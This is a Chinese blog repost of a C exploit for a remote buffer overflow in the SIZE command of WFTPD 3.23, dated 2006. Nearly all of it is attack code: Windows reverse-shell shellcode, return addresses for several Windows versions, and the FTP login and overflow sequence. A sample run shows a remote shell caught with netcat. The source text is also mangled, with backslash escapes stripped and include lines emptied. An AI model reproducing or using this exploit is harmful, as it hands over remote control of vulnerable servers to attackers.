ITPub博客

首页 > IT基础架构 > 网络安全 > WFTPD 3.23 (SIZE) Remote Buffer Overflow Exploit

WFTPD 3.23 (SIZE) Remote Buffer Overflow Exploit

原创 网络安全 作者:coolwinds 时间:2006-08-22 21:33:18 0 删除 编辑

/*
* wftpd_exp.c
* WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
* coded by h07 <h07@interia.pl>
* tested on XP SP2 polish, 2000 SP4 polish
* example..

C:>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444

[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
[*] coded by h07 <h07@interia.pl>
[*] FTP response: 331 Give me your password, please
[*] FTP response: 230 Logged in successfully
[+] sending buffer: ok
[*] press enter to quit

C:>nc -l -p 4444
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:wftpd323>
*/

[@more@]

#include
#include
#define BUFF_SIZE 1024
#define PORT 21

//win32 reverse shellcode (metasploit.com)

char shellcode[] =

"x31xc9x83xe9xb8xd9xeexd9x74x24xf4x5bx81x73x13xb6"
"x10x92x98x83xebxfcxe2xf4x4ax7ax79xd5x5exe9x6dx67"
"x49x70x19xf4x92x34x19xddx8ax9bxeex9dxcex11x7dx13"
"xf9x08x19xc7x96x11x79xd1x3dx24x19x99x58x21x52x01"
"x1ax94x52xecxb1xd1x58x95xb7xd2x79x6cx8dx44xb6xb0"
"xc3xf5x19xc7x92x11x79xfex3dx1cxd9x13xe9x0cx93x73"
"xb5x3cx19x11xdax34x8exf9x75x21x49xfcx3dx53xa2x13"
"xf6x1cx19xe8xaaxbdx19xd8xbex4exfax16xf8x1ex7exc8"
"x49xc6xf4xcbxd0x78xa1xaaxdex67xe1xaaxe9x44x6dx48"
"xdexdbx7fx64x8dx40x6dx4exe9x99x77xfex37xfdx9ax9a"
"xe3x7ax90x67x66x78x4bx91x43xbdxc5x67x60x43xc1xcb"
"xe5x53xc1xdbxe5xefx42xf0xb6x10x92x98xd0x78x92x98"
"xd0x43x1bx79x23x78x7ex61x1cx70xc5x67x60x7ax82xc9"
"xe3xefx42xfexdcx74xf4xf0xd5x7dxf8xc8xefx39x5ex11"
"x51x7axd6x11x54x21x52x6bx1cx85x1bx65x48x52xbfx66"
"xf4x3cx1fxe2x8exbbx39x33xdex62x6cx2bxa0xefxe7xb0"
"x49xc6xc9xcfxe4x41xc3xc9xdcx11xc3xc9xe3x41x6dx48"
"xdexbdx4bx9dx78x43x6dx4exdcxefx6dxafx49xc0xfax7f"
"xcfxd6xebx67xc3x14x6dx4ex49x67x6ex67x66x78x62x12"
"xb2x4fxc1x67x60xefx42x98";

void config_shellcode(unsigned long ip, unsigned short port)
{
memcpy(&shellcode[184], &ip, 4);
memcpy(&shellcode[190], &port, 2);
}

unsigned long target[] =
{
0x7d16887b, //JMP ESI (XP SP2 polish)
0x776f2015, //JMP ESI (2000 SP4 polish)
0x7cb9e082, //JMP ESI (XP SP2 english)
0x7848a5f1, //JMP ESI (2000 SP4 english)
0x7ca96834 //JMP ESI (XP SP2 german)
};

char buffer[BUFF_SIZE];

main(int argc, char *argv[])
{
int sock, id, opt, r_len;
unsigned long eip;
unsigned long connectback_IP;
unsigned short connectback_port;
struct hostent *he;
struct sockaddr_in client;
WSADATA wsa;

printf("n[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploitn");
printf("[*] coded by h07 <n">h07@interia.pl>n");

if(argc < 8)
{
printf("[*] usage:..n %s nn", argv[0]);
printf("[*] ID list:n");
printf("[>] 0: XP SP2 polishn");
printf("[>] 1: 2000 SP4 polishn");
printf("[>] 2: XP SP2 englishn");
printf("[>] 3: 2000 SP4 englishn");
printf("[>] 4: XP SP2 germannn");
printf("[*] opt - WFTPD option 'restrict to home directory and below'n");
printf("[>] 0: disabledn");
printf("[>] 1: enablednn");
printf("[*] sample: %s 0 0 192.168.0.2 h07 open 192.168.0.1 4444nn", argv[0]);
exit(0);
}

WSAStartup(MAKEWORD(2, 0), &wsa);

id = atoi(argv[1]);
opt = atoi(argv[2]);

if((id > 4) || (id < 0))
{
printf("[-] ID error: unknown targetn");
exit(-1);
}

if((opt > 1) || (opt < 0))
{
printf("[-] opt error: unknown optionn");
exit(-1);
}

eip = target[id];
connectback_IP = inet_addr(argv[6]) ^ (ULONG)0x989210b6;
connectback_port = htons(atoi(argv[7])) ^ (USHORT)0x9892;
config_shellcode(connectback_IP, connectback_port);

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if((he = gethostbyname(argv[3])) == NULL)
{
printf("[-] Unable to resolven");
exit(-1);
}

client.sin_addr = *((struct in_addr *)he->h_addr);
client.sin_port = htons(PORT);
client.sin_family = AF_INET;

if(connect(sock, (struct sockaddr *) &client, sizeof(client)) == -1)
{
printf("[-] error: connect()n");
exit(-1);
}

recv(sock, buffer, BUFF_SIZE -1, 0);

//USER
memset(buffer, 0, BUFF_SIZE);
sprintf(buffer, "USER %srn", argv[4]);
send(sock, buffer, strlen(buffer), 0);
recv(sock, buffer, BUFF_SIZE -1, 0);
printf("[*] FTP response: %s", buffer);

//PASS
memset(buffer, 0, BUFF_SIZE);
sprintf(buffer, "PASS %srn", argv[5]);
send(sock, buffer, strlen(buffer), 0);
recv(sock, buffer, BUFF_SIZE -1, 0);
printf("[*] FTP response: %s", buffer);

if(strstr(buffer, "530") != 0) exit(-1);

//SIZE
memset(buffer, 0x90, BUFF_SIZE);
memcpy(buffer, "SIZE ", 5);

switch(opt)
{
case 0:
{
memcpy(buffer + 5, "/", 1);
r_len = 531;
break;
}
case 1:
{
memcpy(buffer + 5, "//", 2);
r_len = 532;
break;
}
}

memcpy(buffer + 7, shellcode, sizeof(shellcode) -1);
*((unsigned long*)(&buffer[r_len])) = eip;
memcpy(buffer + (r_len + 4), "rnx00", 3);


if(send(sock, buffer, strlen(buffer), 0) != -1)
printf("[+] sending buffer: okn");
else
printf("[-] sending buffer: failedn");

printf("[*] press enter to quitn");
getchar();
}

//EoF

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-859533/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论

注册时间:2012-10-23

  • 博文量
    253
  • 访问量
    950444